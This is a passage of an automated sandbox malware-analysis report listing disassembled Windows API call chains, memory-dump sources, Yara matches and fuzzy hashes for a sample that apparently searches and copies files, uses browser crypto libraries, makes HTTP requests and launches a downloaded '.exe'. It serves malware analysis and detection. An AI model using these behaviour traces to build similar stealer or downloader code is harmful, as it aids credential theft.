                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4564A9
                                                                                                                                                                                            • Part of subcall function 6C44FA80: GetCurrentThreadId.KERNEL32 ref: 6C44FA8D
                                                                                                                                                                                            • Part of subcall function 6C44FA80: AcquireSRWLockExclusive.KERNEL32(6C49F448), ref: 6C44FA99
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C45653F
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C45655A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3596744550-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • malloc.MSVCRT ref: 0003BDC5
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0003BDD9
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0003BE26
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,6703F1C6,?,00000000,0A0524C0,?,00000001,0A0524C0,?,0003AE6B,?,00000001,0A0524C0,6703F1C6,?), ref: 0003BE45
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memmove$FileWritemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 803809635-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000322D7
                                                                                                                                                                                            • Part of subcall function 00031D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00032301,?), ref: 00031D6C
                                                                                                                                                                                            • Part of subcall function 00031D61: HeapAlloc.KERNEL32(00000000), ref: 00031D73
                                                                                                                                                                                            • Part of subcall function 00031D61: wsprintfW.USER32 ref: 00031D84
                                                                                                                                                                                          • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0003237D
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0003238B
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00032392
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2224742867-0
                                                                                                                                                                                          • Opcode ID: 4d0111fe9641b4887003351d3574db1db0104854f09f7c561ee7cfaad75ac613
                                                                                                                                                                                          • Instruction ID: cbe2f7e8d2da3b61780d899aea90067cd3a23c0350cc9720828b1f821d498b6c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d0111fe9641b4887003351d3574db1db0104854f09f7c561ee7cfaad75ac613
                                                                                                                                                                                          • Instruction Fuzzy Hash: 53313EB2A01218AFDF219FA4DC889EE77BCEF0A344F0404A5F509E2551D6349F858F62
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 000366A7
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056B4C), ref: 000366C4
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 000366D7
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056B50), ref: 000366E9
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036018
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindFirstFileA.KERNEL32(?,?), ref: 0003602F
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB4), ref: 00036050
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB8), ref: 0003606A
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036091
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056647), ref: 000360A5
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360C2
                                                                                                                                                                                            • Part of subcall function 00035FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000360EF
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?), ref: 00036125
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD0), ref: 00036137
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 0003614A
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD4), ref: 0003615C
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 00036170
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360D9
                                                                                                                                                                                            • Part of subcall function 00035FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00036229
                                                                                                                                                                                            • Part of subcall function 00035FD1: DeleteFileA.KERNEL32(?), ref: 0003629D
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindNextFileA.KERNEL32(?,?), ref: 000362FF
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindClose.KERNEL32(?), ref: 00036313
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2104210347-0
                                                                                                                                                                                          • Opcode ID: 7c6b49a2cd97d9f4afc527122d405b0f1da93bb6b0d1183490be05aa0e9deebf
                                                                                                                                                                                          • Instruction ID: 3f58b036d1caf51f716a3dbba3f64cba71b6f394309a75962d09dc1a65476d64
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c6b49a2cd97d9f4afc527122d405b0f1da93bb6b0d1183490be05aa0e9deebf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9021927590011CAFCF50EB60EC46ADDB7BDEB18301F4140E1BA4997261EFB19AC58F51
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C5A2E08
                                                                                                                                                                                            • Part of subcall function 6C5914C0: TlsGetValue.KERNEL32 ref: 6C5914E0
                                                                                                                                                                                            • Part of subcall function 6C5914C0: EnterCriticalSection.KERNEL32 ref: 6C5914F5
                                                                                                                                                                                            • Part of subcall function 6C5914C0: PR_Unlock.NSS3 ref: 6C59150D
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C5A2E1C
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C5A2E3B
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5A2E95
                                                                                                                                                                                            • Part of subcall function 6C591200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5388A4,00000000,00000000), ref: 6C591228
                                                                                                                                                                                            • Part of subcall function 6C591200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C591238
                                                                                                                                                                                            • Part of subcall function 6C591200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5388A4,00000000,00000000), ref: 6C59124B
                                                                                                                                                                                            • Part of subcall function 6C591200: PR_CallOnce.NSS3(6C692AA4,6C5912D0,00000000,00000000,00000000,?,6C5388A4,00000000,00000000), ref: 6C59125D
                                                                                                                                                                                            • Part of subcall function 6C591200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C59126F
                                                                                                                                                                                            • Part of subcall function 6C591200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C591280
                                                                                                                                                                                            • Part of subcall function 6C591200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C59128E
                                                                                                                                                                                            • Part of subcall function 6C591200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C59129A
                                                                                                                                                                                            • Part of subcall function 6C591200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C5912A1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1441289343-0
                                                                                                                                                                                          • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                          • Instruction ID: cfecec9460557443c6b8fc1eada8883144e59ca2d3abb4d5878ae68aa4926798
                                                                                                                                                                                          • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221F571E003918BEB00CF969D457BF36646BD134CF114269DD0C5B642F7B1DA998292
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C55ACC2
                                                                                                                                                                                            • Part of subcall function 6C532F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C532F0A
                                                                                                                                                                                            • Part of subcall function 6C532F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C532F1D
                                                                                                                                                                                            • Part of subcall function 6C532AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C530A1B,00000000), ref: 6C532AF0
                                                                                                                                                                                            • Part of subcall function 6C532AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C532B11
                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C55AD5E
                                                                                                                                                                                            • Part of subcall function 6C5757D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C53B41E,00000000,00000000,?,00000000,?,6C53B41E,00000000,00000000,00000001,?), ref: 6C5757E0
                                                                                                                                                                                            • Part of subcall function 6C5757D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C575843
                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(?), ref: 6C55AD36
                                                                                                                                                                                            • Part of subcall function 6C532F50: CERT_DestroyCertificate.NSS3(?), ref: 6C532F65
                                                                                                                                                                                            • Part of subcall function 6C532F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C532F83
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C55AD4F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C58F0AD,6C58F150,?,6C58F150,?,?,?), ref: 6C58ECBA
                                                                                                                                                                                            • Part of subcall function 6C590FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5387ED,00000800,6C52EF74,00000000), ref: 6C591000
                                                                                                                                                                                            • Part of subcall function 6C590FF0: PR_NewLock.NSS3(?,00000800,6C52EF74,00000000), ref: 6C591016
                                                                                                                                                                                            • Part of subcall function 6C590FF0: PL_InitArenaPool.NSS3(00000000,security,6C5387ED,00000008,?,00000800,6C52EF74,00000000), ref: 6C59102B
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C58ECD1
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C58ED02
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59116E
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C58ED5A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C5A7FFA,?,6C5A9767,?,8B7874C0,0000A48E), ref: 6C5BEDD4
                                                                                                                                                                                          • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C5A7FFA,?,6C5A9767,?,8B7874C0,0000A48E), ref: 6C5BEDFD
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C5A7FFA,?,6C5A9767,?,8B7874C0,0000A48E), ref: 6C5BEE14
                                                                                                                                                                                            • Part of subcall function 6C590BE0: malloc.MOZGLUE(6C588D2D,?,00000000,?), ref: 6C590BF8
                                                                                                                                                                                            • Part of subcall function 6C590BE0: TlsGetValue.KERNEL32(6C588D2D,?,00000000,?), ref: 6C590C15
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C5A9767,00000000,00000000,6C5A7FFA,?,6C5A9767,?,8B7874C0,0000A48E), ref: 6C5BEE33
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C42B4F5
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C42B502
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C42B542
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C42B578
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C5C5F17,?,?,?,?,?,?,?,?,6C5CAAD4), ref: 6C5DAC94
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C5C5F17,?,?,?,?,?,?,?,?,6C5CAAD4), ref: 6C5DACA6
                                                                                                                                                                                          • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C5CAAD4), ref: 6C5DACC0
                                                                                                                                                                                          • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C5CAAD4), ref: 6C5DACDB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3989322779-0
                                                                                                                                                                                          • Opcode ID: a1c0f50ee64d3332e53cb549c7ed3159a2304ead26034caaa028bdff96f4347f
                                                                                                                                                                                          • Instruction ID: af7bb900698cd4178b4674b2bc4465ca3f70ed20b85b09cd4d68cd2ac72aad27
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1c0f50ee64d3332e53cb549c7ed3159a2304ead26034caaa028bdff96f4347f
                                                                                                                                                                                          • Instruction Fuzzy Hash: E7018CB1601B01ABE720DF3AED48743B7E8BF10669B004839E85AC3A10E735F458CBA5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,000565B6,?,?,?), ref: 00030CD8
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00030CDF
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00030CEB
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00030D16
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1243822799-0
                                                                                                                                                                                          • Opcode ID: e50d2586b9b75ef63fc87f8a58c07bcc6467bc7413c540c3125aa1d8391bf287
                                                                                                                                                                                          • Instruction ID: 703a1d7532421ea345d0ebe329c6d7522436df8023c64ab45d448d4cae8c1b65
                                                                                                                                                                                          • Opcode Fuzzy Hash: e50d2586b9b75ef63fc87f8a58c07bcc6467bc7413c540c3125aa1d8391bf287
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF0E1A5900118BBDB50AFE5AD09ABF77BCEB0C715F410096F945E6190E6389A80D771
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00034FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00034FAC,?), ref: 00032181
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00034FAC,?,?,?,00034FAC,?), ref: 00032199
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00034FAC,?), ref: 000321A4
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00034FAC,?), ref: 000321AC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4148174661-0
                                                                                                                                                                                          • Opcode ID: 7a7e38dd80ee763f367b6025e5460fbce9cfebce200e0e4a580ad194746cf5a5
                                                                                                                                                                                          • Instruction ID: 0e99a561e0ada54a15e9ca67feb041695e4969ac3370b9e3eba024059e0830c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7e38dd80ee763f367b6025e5460fbce9cfebce200e0e4a580ad194746cf5a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0A731601214FBFB2197A0FD1DFDE7A6CEB18760F210150FA01BA1D0D7706A8086B0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2988086103-0
                                                                                                                                                                                          • Opcode ID: be0414748436e4af30021e713b8597f3f66605d2d30b16dfa6898cc151e3b4da
                                                                                                                                                                                          • Instruction ID: 97e3c4fe79b67bb3635c39cadce2862d8d8e554233d01dff52f6d9e2b0b61736
                                                                                                                                                                                          • Opcode Fuzzy Hash: be0414748436e4af30021e713b8597f3f66605d2d30b16dfa6898cc151e3b4da
                                                                                                                                                                                          • Instruction Fuzzy Hash: ADE03076701609BBCB10EFA9DC84C8677ACEE4A6707150625E692C3700D236F905CBA5
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00025237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002527E
                                                                                                                                                                                            • Part of subcall function 00025237: RtlAllocateHeap.NTDLL(00000000), ref: 00025285
                                                                                                                                                                                            • Part of subcall function 00025237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 000252A7
                                                                                                                                                                                            • Part of subcall function 00025237: StrCmpCA.SHLWAPI(?), ref: 000252C1
                                                                                                                                                                                            • Part of subcall function 00025237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000252F1
                                                                                                                                                                                            • Part of subcall function 00025237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00025330
                                                                                                                                                                                            • Part of subcall function 00025237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00025360
                                                                                                                                                                                            • Part of subcall function 00025237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0002536B
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00032446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00034A8D), ref: 00032460
                                                                                                                                                                                          • _memset.LIBCMT ref: 00032CDF
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00056710), ref: 00032D31
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                          • API String ID: 2831197775-4119554291
                                                                                                                                                                                          • Opcode ID: 3bb83ac60f823d203e9355bcef7f992f7d41c2eabed64811fc75709de9cc616b
                                                                                                                                                                                          • Instruction ID: fec9d67ded01570b9384b59668085f98517e11b647504e50e4eec46cded1bf67
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bb83ac60f823d203e9355bcef7f992f7d41c2eabed64811fc75709de9cc616b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42415B72A00128BBDF12FBA4EC43ADE7778AF44314F510161FA04B7157DA70AE4A8BE1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C584D57
                                                                                                                                                                                          • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C584DE6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorR_snprintf
                                                                                                                                                                                          • String ID: %d.%d
                                                                                                                                                                                          • API String ID: 2298970422-3954714993
                                                                                                                                                                                          • Opcode ID: 8717d34dd41c5d103e1a40a5d9bb367122564b196e0f828e7ac0c462c9d94305
                                                                                                                                                                                          • Instruction ID: 245a115014a03896d8af4de9c47e3f11fc54458f77e9af4a6634311d7c349f71
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8717d34dd41c5d103e1a40a5d9bb367122564b196e0f828e7ac0c462c9d94305
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4331EEB2D02229ABEB109BA19C11BFF776CEF80308F050419ED5597742EB309D05CBE6
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                                          • String ID: string too long
                                                                                                                                                                                          • API String ID: 256744135-2556327735
                                                                                                                                                                                          • Opcode ID: 8570abda51f8bace0a4df267ccae70ec0a88b9d68e7ca65534da1d888ac86291
                                                                                                                                                                                          • Instruction ID: 81236bb2aa0fd3d92a4768c8b4abdad719062a50092515bf5e0fce08fe17724f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8570abda51f8bace0a4df267ccae70ec0a88b9d68e7ca65534da1d888ac86291
